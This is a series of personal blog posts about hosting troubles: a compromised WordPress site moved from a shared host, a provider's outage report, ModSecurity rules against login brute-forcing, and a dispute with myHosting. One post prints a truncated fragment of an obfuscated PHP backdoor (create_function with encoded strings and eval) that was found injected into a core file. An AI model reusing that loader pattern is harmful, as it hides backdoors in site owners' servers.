Today’s hour long educational presentation…

Even if you don’t really speak tech, watch it.  He doesn’t really go into deep details, though it does require some understanding of how networking works.

If you still don’t want to take the hour let me synopsize it into one single sentence:

Nothing is safe.

And there isn’t much of a hope for immediate improvement either because the NSA is leaning on organizations to leave a lot of this crap in place.  Not to mention they do not report security threats instead they want them left open for exploitation.

There are couple things that desperately need to change, one of the biggest is security needs to stop being an afterthought in software and systems development.  I’ve said it before folks, we’re in a cold war and one side just doesn’t want to admit the truth of the matter yet.

Zombies are Real and Infectious…

hacker-free-hack-the-planet-112296

That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start at the beginning.  Over the past month I’ve been busy working on polishing the finishing edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to provide me the best probabilities for survival when the inevitable finally happens.

Last weekend I migrated bloggers Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly resolved.  That done I set my sights on moving Weer’d.

I logged in, dumped the database, tar’d up the site.  The tar fails, odd, what do you mean you couldn’t read that file?  Didn’t think much of it, found the file, odd the permissions are 000.  This isn’t my site though and I’m not sure if there was something special done so I fix it.  In total I fix 8 files like this.  I move the site over, and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not give me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ‘66.249.76.207’, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ‘66.249.76.207’, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

What!?  I promptly dump open that file and am greeted by the following:

/**

* Applies custom filter.

*ap

* @since 0.71

*

* $text string to apply the filter

* @return string

*/

function applyfilter($text=null) {

  @ini_set(‘memory_limit’,‘256M’);

  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,“\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73”); if(!function_exists(“O01100llO”)){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,‘od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl’,6274);}call_user_func(create_function(,“\x65\x76\x61l(\x4F01100llO());”));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}

}

Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.

I have no idea how severe this incident is at this point I trust absolutely no one.  My first order of business is to close the problem that I now see.  I manually reinstall WordPress overwriting ALL the existing files on the server.  This promptly stops those trailing messages in my log.  Something new happens though.

Weer’d has WordFence security, fantastic plugin and I highly suggest it, and I run a scan, it say’s nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.

image

There’s the list in a little more file friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.

After a short while I had the site cleaned up on my server.  I will do a more through cleaning but that was the immediate action remedy for BF 30 in the am Sunday night.

I do however want to investigate the details of this.  I login to the old server with Dreamhost and start looking around. I want to isolate the cause of the breach and determine if there are any other issues. Did this just suddenly go sideways on my box or was this a preexisting condition and to what depths did it go?  All the exploits are present, so that means it was prior to the move and wasn’t anything on my side and then I look at the root directory:

clip_image002

Do you see it?  Here’s the dump of what’s inside:

clip_image002[4]

Now if you closely pay attention you can gleam a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly though we can note the date for the last edit October 5th, 2012.

There’s a reason that rung a bell with me.  From an article dated Oct 3, 2012

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as “itsoknoproblembro.” When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friends place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing and remember they’re the one’s who actually suffered a data breach and have a sever where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v “/Maildir/” | grep -v “/logs/”
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
http://wiki.dreamhost.com/My_Wordpress_site_was_hacked
More information on this topic is available at the following URL under the “CGI Hack” and “Cleaning Up” sections:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and Dreamhost’s response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites within other accounts?

The real reason we were informing you is because you have a breach which placed everyone who has data on that server in danger.  I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you boy genius.

Yes I understand you want to look good and not like a complete idiot in front of your customers.  Know what though “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious and at least an acknowledgement of, “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks, every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved and todays was a bit of an odd duck that only affected one site but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and are best dealt with a serious dose of heavy metal positing followed by a tactical nuke to the general vicinity.  Be very careful too, sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”


SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event of if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA
http://www.liquidweb.com/about/dedicatedsla.html

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.


Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I2R losses as always, are a pain in the ass.

0 to Attacked in No Time Flat

So as I’ve mentioned previously I’ve moved to the world of a VPS which for all intents in purposes is much like being self-hosted.  I used to do this stuff a long time ago, I still do it but not nearly as intensively and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server setup and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I just set up this server though, who could possibly be attacking it?

A6WLUZ bandwidth (full)

Bandwidth usage since I turned on the server.

You can see where I turned the server on on the 13th.  Notice that big spike shortly there after, yeah that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site since it locked up within minutes and I had tweaked some server settings an thought that caused the instability.

Come Monday morning I have an email from A Girl that she cannot get in and 2 from the data-center that they rebooted the server after it ran out of memory and locked up.

A6WLUZ_load_full

System loading and availability since being turned on.

You cant see it as well except for the latest incident in those images but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched from APF to CSF for my firewall so I could gain use of the LFD.  I spent my time installing and configuring it last night.

A6WLUZ Detail

The Proc Spike I had overnight.

 

A6WLUZ

A more detailed image of the bandwidth spikes.

There you can see the proc spike from an an incident last night.  I did a few more tweaks to the CSF and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discover that there is a way to have Apache watch all the wp-login pages for failed logins.  When they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach in handling the problem.

If you are a server administrator and want to protect against the WordPress brute force attack it is quite simple, doubly so if you have WHM.

Login to WHM, goto Software-EasyApache.  Follow the onscreen instructions and rebuild Apache but make sure the modsec2 module is selected.  Build Apache.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

#Block WP logins with no referring URL
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210
<Locationmatch “/wp-login.php”>
SecRule REQUEST_METHOD “POST” “deny,status:401,id:5000211,chain,msg:’wp-login request blocked, no referer'”
SecRule &HTTP_REFERER “@eq 0”

#Wordpress Brute Force detection
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212
<Locationmatch “/wp-login.php”>
# Setup brute force detection.
# React if block flag has been set.
SecRule ip:bf_block “@gt 0” “deny,status:401,log,id:5000213,msg:’ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.'”
# Setup Tracking. On a successful login, a 302 redirect is performed, a 200 indicates login failed.
SecRule RESPONSE_STATUS “^302” “phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214”
SecRule RESPONSE_STATUS “^200” “phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215”
SecRule ip:bf_counter “@gt 10” “t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0”

Save the file and restart Apache.  This will help stop the brute force attacks.  If it wasn’t for the off chance of false positives, I’d be good with a perma-ban and dropping that axe like a rock….

Funny story, I dropped that !@#$ing ax on myself tonight.  Most of the other services are watched by LFD and when you get multiple login failures, it drops the ax and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business and tried to login a couple times with the wrong password and bam there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that it sounds like my intrusion detection system works for the TSA.

In the mean time the folks I got the VPS from (they’ve been fantastic support wise, unlike that previous host) are looking into trying to figure out what’s causing the load spikes.  The bummer is it randomly happens so it’s a paint to catch in the act. The good news is the past couple slams the server has actually survived so it’s almost there.  Security wise it isn’t a concern, it’s just and issue with service.

Too Little Too Late…

So I got the following email at 1630 tonight.  I know the ball started at 0800 this morning thanks to twitter.  They may have had that many complaints to work through but here is the email I got.

Dear Barron,

My name is CS Rep and I am writing you from Customer Relation Department. Your case was brought to my attention because you gave us a bad review on Twitter. We are very serious about providing you with an exceptional hosting and customer service experience, we would like to confirm that everything is running as you would like. What would it take for us to became the best hosting provider for you?
Your feedback is crucial for our business to move forward. We are still that strong company with quality and products as we continue to invest more into support and service in terms of training and technology.
Do not hesitate to use my direct line (her number) or 24/7 technical support (their number) or simply reply to this email: [email protected].

Thank you for choosing myhosting.com, I hope we can get your positive tweets shorty.

Sincerely,

CS Rep

My world at work is customer service.  So I am always willing to respond so that if they’re actually willing to improve their service they can.  Here is my response.

Hi Olga,

Let me start off by saying at this point I will be leaving myHosting.  I have invested in outside hosting, at best I will retain my myHosting account for exchange email purposes.  That said as someone who works for a company that strives on customer service I’m going to lay out from beginning to end and my perspective on it.

Last month I had regular service issues despite my use of the CloudFlare CDN. I opened ticket #: FNF-528-19240

After multiple back and forth arguments about whether or not my site was hosted with myHosting finally they just blamed CloudFlare, the problem continued but with less frequency.  I just dealt with it.  For the most part the site would immediately come back on a refresh and none of my customers were noticing an issue or reporting one to me.

Then in the midst of this WordPress attack, I started to have issues a little more frequently. I started to get emails from my Customers and I did what I could on my end to fix the issue.  Then it happened, I and all my customers, 4 total, were locked out of their sites.  We were locked out without any email in my inbox of how to fix the issue.  When the solution did arrive after my promptly emailing support it was a solution that none of my 4 customers could implement, much less be feasible for 2 of them.  Despite my efforts in maintaining a secure WordPress site, including plugins to stop the brute force attacks, my site was rendered unusable not just to me, but my customers.  I actually had to disabled Cloudflare thus increasing my exposure to SPAM and other undesirable traffic.

Just so I am perfectly clear.  The actions of myHosting taken to “secure” the websites for which I am responsible resulted in their inability to function for my customers.  It took me at least 12 hours before I could finally get those sites unlocked for my customers.  During this time my ability to handle issues as well as my general perception to my customers was degraded.  Doubly so since while trying to unlock 2 of the site resulted in 500 internal server errors.  Once that error was corrected, cleanURLs was broken due to other changes to the .htaccess files by myHosting.  Instead of just correcting their errors to the files, they dumped them. This made me look like an idiot again when a customer informed me in the morning he was getting 404 errors.

That night I started the migration to a VPS with another company.  I could not trust that myHosting, even in a VPS, would not mess with my files or otherwise cause me issues and heartache.

I will say the shining spot in this entire mess was it appeared that I dealt with one single support representative.  That is ownership and honestly that is what I like to see.  But here is his last email, Don’t blame him though, he was trying to keep the peace and convey your situation. It is a lesson in needing to be seriously empathetic to customers and the effects of your actions as a provider.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict.
Because you appear to have a very secure webspace, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack, so please proceed with caution and make sure all wordpress user passwords are complex and secure.

We have disabled the .htaccess files on those two websites and they appear to be loading currently. If you would like, remove all the added code and turn your cloudflare back on.

Please let it be known we are trying to protect our customers the best possible way. Because of the urgency of the matter, this was the quickest solution. We hope this does not ruin your experience with myhosting.com.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

Here’s how I read it:

Your Text.
My Corrections in Phrasing.
My mental commentary while reading.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. Because evidently the idea someone would be unhappy about being locked out of their own website surprises us.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrictdecided to treat all our users like idiotic children that know nothing about anything.  Luckily I have experience with being penalized because of the actions of others.

Because you appear to have a very secure webspaceactually know what the fuck you’re doing and have previously educated our support staff, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attacka brute force attack where they just randomly try passwords, so please proceed with caution and make sure all wordpress user passwords are complex and secure.  Why in the name of god do you think I use keypass and generate 20 character password strings, just for the ease in memorization?

We have disabled the .htaccess files on those two websites and they appear to be loading currentlybut we broke clean URLs so they’re still not working right, our bad? If you would like, remove all the added code and turn your cloudflare back on.  You mean I can unfuck my websites if I so choose!?  Here I thought you guys were just out to screw me in front of people I support.  And yes I unfucked every one I could as fast as I could, even before I got your permission!

Please let it be known we are trying to protect our customers the best possible way, by nuking the site from orbit by treating our customers like children and blocking their access to their own sites just the same as the attackers. Because of the urgency of the matter, this was the quickest solution, because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin. We hope this does not ruinare sorry this has completely ruined your experience with myhosting.com.  We didn’t consider the ramifications of how our actions could possible make our customers look in the eyes of their own clients.  We will think about possibly not treating all our customers like children in the future but don’t count on it.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

And yes, this did go up on my blog, this email will be going up as well.  I want you to understand exactly how badly this has cut into me.  I strive myself on customer service and whenever possible I stop what I’m doing to help when there is an issue.  Even when these people do not pay me a dime for my services.  I get an email at 0400 in the morning and if my phone actually wakes me up I will look and go fix the problem.  I take my wife out to dinner and get a text message that the server is down and I spend the rest of dinner cranking away on my phone to fix the problem.  That is customer service, owning the problem and fixing it.  Most definitely you do NOT create problems for the customer and if you do, you fix them 100% and ensure the site is returned to normal.  You do everything you can for that customer to ensure the problem is fixed immediately and any issues created are taken care of or assisted with to the best of your ability.

You must also remember when you do go and do something like that, it has consequences beyond just your visible customer level.  Your customers have customers.  Some have business and those types of actions cost them money and trust.  In this case myHosting caused a question regarding my integrity with my ability to be a provider for website services.  Integrity once lost can never be regained and I find the actions of myHosting down right deplorable given their impact on me, my business, and my customers.

If you have any other questions feel free to ask.

Sincerely,

Barron Barnett

I’m not holding out for another response back, but I figured I’d give them honest feedback. I will say I was kind of happy to get the kick in the ass to go get a VPS.

If you’re reading this, it is done…

If you are seeing this post that means that you are now staring at my new and shiny VPS.

There is a pile of stuff I’m still cleaning up and I’ve got a pile of sites to move over and this one only took me about 5 hours to do.  I’m hoping the others go more quickly but the majority of the time was spent downloading and uploading with a bit of tweaking files here and there.

In the mean time if you find something broken or out of place.  Please let me know so I can get it fixed immediately.

Thanks.

Saying Good-Bye to My Hosting…

I suppose I could layout the entire email chain that went down yesterday that actually started Thursday night.

Suffice it to say, for those who aren’t aware there is currently a brute force attack against any and all WordPress websites.  Overall this is not the most difficult thing to spot, most of the logins all use the same user name and overall they’re just not that intelligent.  Evidently my current provider, My Hosting, was getting slammed and quite hard.  In an effort to head the problem off at the pass they edited everyone’s .htaccess files to restrict access to the WordPress login page.  This wouldn’t be a problem except they had a default deny so site owners were locked out.  Most definitely that’s not Shiny.

The last email I got in the exchange as I was trying to fix the issues is here, along with additional comments.

Their Text.
Wrong Words My Corrections in Phrasing.
My mental commentary while reading.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. Because evidently the idea someone would be unhappy about being locked out of their own website surprises us.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrictdecided to treat all our users like idiotic children that know nothing about anything.  Luckily I have experience with being penalized because of the actions of the few.

Because you appear to have a very secure webspaceactually know what the fuck you’re doing and have previously educated our support staff, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attacka brute force attack where they just randomly try passwords, so please proceed with caution and make sure all wordpress user passwords are complex and secure.  Why in the name of god do you think I use keypass and generate 20 character password strings, just for the ease in memorization?

We have disabled the .htaccess files on those two websites and they appear to be loading currently, but we broke clean URLs so they’re still not working right, our bad? If you would like, remove all the added code and turn your cloudflare back on.  You mean I can unfuck my websites if I so choose!?  Here I thought you guys were just out to screw me in front of people I support.  And yes I unfucked every one I could as fast as I could, even before I got your permission!

Please let it be known we are trying to protect our customers the best possible way, by nuking the site from orbit by treating our customers like children and blocking their access to their own sites just the same as the attackers. Because of the urgency of the matter, this was the quickest solution, because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin. We hope this does not ruinare sorry this has completely ruined your experience with myhosting.com.  We didn’t consider the ramifications of how our actions could possible make our customers look in the eyes of their own clients.  We will think about possibly not treating all our customers like children in the future but don’t count on it.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

That final email just kind of shoved me over the edge with absolutely not wanting to stick around.  Seriously, that’s pretty much how I read when it came in.  I didn’t discover the .htaccess issue with clean URLs being totaled until this morning when Sean emailed me.

Seriously +1 to them on ownership for support.  Other than this recent shit storm they’ve been a decent host but I’m biting the bullet and going to a VPS.  Because of my love for Microsoft Exchange I’ll be getting a separate host for email just for the wife and I but at this point I’m downloading sites one by one and moving them to the VPS when possible.

This site will be the first to move and will hopefully be done by early in the evening.  I still need to finish securing the VPS and doing other setup work.

Hosting Issues…

For those unaware there is a massive attack on all WordPress sites currently.  My hosting provider has taken some actions to “help stop the attack”.

Well their actions have caused me to have to disable CloudFlare and have effectively issued a denial of service attack against me and those I take care of site maintenance for.

I was able to get my blog unlocked, but I have not been able to gain access to the necessary files for the other blogs.  I am now ripping support a new one and calling this a total customer service failure.  Pissed barely begins to describe my attitude on this because their poor customer service has made my customer service look poor.  AKA shit rolls down hill and it’s making me look bad.

It looks like for this reason this weekend I will finally fire up a VPS.  Currently I’m getting a little cash to help subsidize the cost but I’m going to have to find a bit more.  It’s an expensive route but it’s just about the only way I can make sure that “my hosting provider” doesn’t go !@#$ing around under the hood of my websites and screw crap up.  I was going to do this when a friend was looking at me to host a site for him and was going to cover a decent amount of the cost.  Looks like I’m just going to have to bite the bullet.

*Nitty details*  The web-hosting provider has blocked all access to the WordPress Login page resulting in no access.  The fix to this is to edit the .htaccess file and they restructured their “App Services” for security reasons and I can no longer find the other websites I’ve installed.  This has left me unable to alter or change the access for the other sites effectively locking me, and the users out unless they were already logged in.